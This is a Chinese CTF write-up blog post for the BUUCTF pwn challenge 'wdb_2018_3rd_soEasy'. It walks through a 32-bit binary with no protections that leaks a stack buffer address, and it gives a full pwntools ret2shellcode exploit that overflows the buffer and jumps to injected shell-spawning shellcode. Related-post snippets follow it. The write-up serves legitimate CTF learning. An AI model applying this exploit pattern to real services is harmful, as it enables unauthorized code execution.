[BUUCTF]PWN——wdb_2018_3rd_soEasy(ret2shellcode)

最新推荐文章于 2024-01-01 22:13:59 发布
最新推荐文章于 2024-01-01 22:13:59 发布
阅读量374 收藏
点赞数
分类专栏: BUUCTF刷题记录 PWN
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/mcmuyanga/article/details/115109542
版权

wdb_2018_3rd_soEasy

  1. 例行检查,32位程序,没有开启任何保护,估计是ret2shellcode
    在这里插入图片描述
  2. 32位ida载入
    在这里插入图片描述
    一开始输buf在栈上的地址,然后存在栈溢出,利用pwntools自动生成shellcode,之后劫持返回地址到buf执行shellcode

exp

from pwn import *

context.arch="i386"

p=remote("node3.buuoj.cn",25832)

p.recvuntil("Hei,give you a gift->")
buf_addr=int(p.recv(10),16)

shellcode=asm(shellcraft.sh())
payload=shellcode.ljust(0x48+4,'\x00')+p32(buf_addr)

p.sendline(payload)

p.interactive()

在这里插入图片描述

Angel~Yan
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[BUUCTF]PWN-wdb_2018_3rd_soEasy
红凳子的博客
05-07 352
[BUUCTF]PWN-wdb_2018_3rd_soEasy前言一、pandas是什么?二、使用步骤1.引入库2.读入数据总结 前言 提示:这里可以添加本文要记录的大概内容: 例如:随着人工智能的不断发展,机器学习这门技术也越来越重要,很多人都开启了学习机器学习,本文就介绍了机器学习的基础内容。 提示:以下是本篇文章正文内容,下面案例可供参考 一、pandas是什么? 二、使用步骤 1.引入库 代码如下(示例): import numpy as np import pandas as pd impo
pwn真的入门了
萍水间人的小天地
05-01 864
终于沉下心来好好的把ctf-wiki上的pwn部分看了一下(当然菜鸡的我海之看懂了栈) 首先需要补充一下aslr 我们可以通过修改 /proc/sys/kernel/randomize_va_space 来控制 ASLR 启动与否,具体的选项有 0,关闭 ASLR,没有随机化。栈、堆、.so 的基地址每次都相同。 1,普通的 ASLR。栈基地址、mmap 基地址、.so 加载基地...
buuctf-pwn write-ups (1)
CoLin的pwn小屋
05-01 396
buuctf-pwn 001-016题wp
wdb_2018_3rd_soEasy
z1r0的博客
02-18 285
wdb_2018_3rd_soEasy 查看保护 很明显的一道shellcode题目,0x48的大小的话直接用pwntools的shellcode即可。 from pwn import * context(arch='i386', os='linux', log_level='debug') file_name = './z1r0' debug = 1 if debug: r = remote('node4.buuoj.cn', 26049) else: r = process(f
从零开始做题:逆向wdb_2018_3rd_soEasy
weixin_44626085的博客
01-01 903
【代码】从零开始做题:逆向wdb_2018_3rd_soEasy
PWN.rar_AVR PWM_GPS FPGA_PWN_avr_avr pwn
09-23
【标题】"PWN.rar" 是一个包含与 AVR 单片机、PWM 脉冲输出、GPS 和 FPGA 相关资源的压缩包。其中,"AVR_PWM_GPS_FPGA_PWN_avr_avr_pwn" 可能是项目或文件集合的命名,暗示了这些技术的综合应用。 【描述】描述指出...
PWN.rar_pulse verilog_pulse width_verilog hdl
09-20
2. **计数器**:为了生成PWM波形,我们需要一个计数器,其数值在每个周期内递增,然后重置。计数器的大小取决于所需的分辨率和最高频率。 ```verilog reg [7:0] counter; always @(posedge clk) begin if (enable)...
mc.zip_package4dr_pwm_pwn发生器_verilog hdl_wayyy7
09-23
标题中的"mc.zip_package4dr_pwm_pwn发生器_verilog hdl_wayyy7"暗示我们正在讨论一个用Verilog编写的PWM(脉冲宽度调制)信号发生器,其特性包括4位的分辨率,可能是通过4个D触发器(D Flip-flops)来实现的。...
Wi-PWN_8.0_ENGLISH_OLED.bin
08-25
这是ESP8266的带OLED显示的WIFI杀手固件。
Wi-PWN_8.0_ENGLISH.bin
08-25
ESP8266的WIFI杀手固件,这是不带显示的。 我后续更新带OLED显示的固件。教程后将更新。
[BUUCTF]PWN6——ciscn_2019_c_1
mcmuyanga的博客
08-25 6809
[BUUCTF]PWN6——ciscn_2019_c_1 题目网址:https://buuoj.cn/challenges#ciscn_2019_c_1 步骤: 例行检查,64位,开启了nx保护 nc一下,看看输入点的字符串,三个选项加密、解密、退出 用64位ida打开,先是shift+f12查看一下程序里的字符串 没有发现system函数和字符串“bin/sh”,先根据输入点的字符串查看一下主要函数 就像一开始说的程序的功能就是加密和解密,看伪代码可以知道,只有选1的时候才会调用encrypt()
[BUUCTF]PWN------rip
BangSen1的博客
01-13 315
rip 例行检查,无保护 运行一下,输出了我们输入的东西, 用64位IDA打开,看到了/bin/sh
[BUUCTF-pwn]——[HarekazeCTF2019]baby_rop2
Y_peak的博客
02-14 260
[BUUCTF-pwn]——[HarekazeCTF2019]baby_rop2 题目地址:https://buuoj.cn/challenges#[HarekazeCTF2019]baby_rop2 checksec一下,64位,开启NX,应该要用到ROPgadget,先看看 在IDA中 思路 利用printf先leek出来一个地址,这里选用了read的地址。找到libc,计算偏移,最终算出,system函数地址和’/bin/sh’字符串的地址。由于是64位,注意寄存器储存参数。(参数小于等于
BUUCTF(pwn)[HarekazeCTF2019]baby_rop
半岛铁盒的博客
03-29 140
因为是64位参数是储存在寄存器中,binsh字符串应该放在 rdi 寄存器中 from pwn import* p = remote("node3.buuoj.cn",28711) rdi=0x400683 sys=0x4005e3 bin=0x601048 payload='a'*(0x10+8)+p64(rdi)+p64(bin)+p64(sys) p.sendline(payload) flag不在根目录下,需要我们找一下,利用find -name flag找一下 find -name "fla.
BUUCTF PWN部分题目wp
awxnutpgs545144602的博客
08-16 2006
pwn好难啊 PWN 1,连上就有flag的pwnnc buuoj.cn 6000得到flag 2,RIP覆盖一下用ida分析一下,发现已有了system,只需覆盖RIP为fun()的地址,用peda计算偏移为23,写脚本 from pwn import* sh=remote('f.b...
buuctf pwn wp(第1.5波)学会用ELF语句进行AAAA(即本地做题目)
月阴荒的博客
03-24 560
这里是一个总的分类,一个类型的第一道题目会详细介绍,后面的类型相同的会简略介绍(不过这是第二波,额还是很简单的,原理可以看我前面的文章,后面难一点的题目我再讲原理。) 这一波题都是无脑AAAA的类型,它们的区别主要就是打入多少个填充字符A的区别,(还有接受到什么字符串的区别),反正都是最简单的一类题。 另外声明,脚本有些来自于网络上(太简单的不想多看,太难的不会,除了中间那一档的也没哪些脚本是自己...
[BUUCTF]PWN——bjdctf_2020_babyrop
BangSen1的博客
03-25 167
bjdctf_2020_babyrop 例行检查 ,开启NX保护。 运行一下。 IDA打开,检索字符串,没有信息。 查看main函数,调用了vuln函数。 buf大小是0x20,但read读取了0x64,明显的溢出漏洞 大概是64位的libc泄露。 根据目前所学,libc泄露需要利用程序里调用过的函数来进行版本泄露,再通过函数的地址来计算出偏移量,从而计算出system函数和字符串“/bin/sh”的地址,再重新执行main函数,构造rop,执行已经得到的system函数和字符串“/bin/sh”
Pwn学习历程(1)--基本工具、交互、调试
热门推荐
Aka丶的博客
12-02 5万+
1、 从基础开始1.1 简单原理介绍以下内容摘自Wiki:   Pwn是一个骇客语法的俚语词,自”own”这个字引申出来的,这个词的含意在于,玩家在整个游戏对战中处在胜利的优势,或是说明竞争对手处在完全惨败的情形下,这个词习惯上在网络游戏文化主要用于嘲笑竞争对手在整个游戏对战中已经完全被击败(例如:”You just got pwned!”)。   在骇客行话里,尤其在另外一种电脑技术方面,包
buuctf ciscn_2019_n_5 (ret2shellcode
carol2358的博客
04-21 1006
无保护,程序直接提供了写入bss,ret2shellcode 一共两次输入,第一次写sh到bss,第二次溢出text然后跳转到bss exp: from pwn import * from LibcSearcher import * local_file = './ciscn_2019_n_5' local_libc = '/usr/lib/x86_64-linux-gnu/libc-...
BUUCTF pwn rip
最新发布
01-28
根据提供的引用内容,BUUCTF PWN-RIP是一个关于PWN技术的详解文章。文章中提到了64位的EIF文件中rbp寄存器的大小为8个字节。如果对这部分不太理解,可以阅读作者的另一篇关于PWN基础知识的文章。 BUUCTF PWN-RIP...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值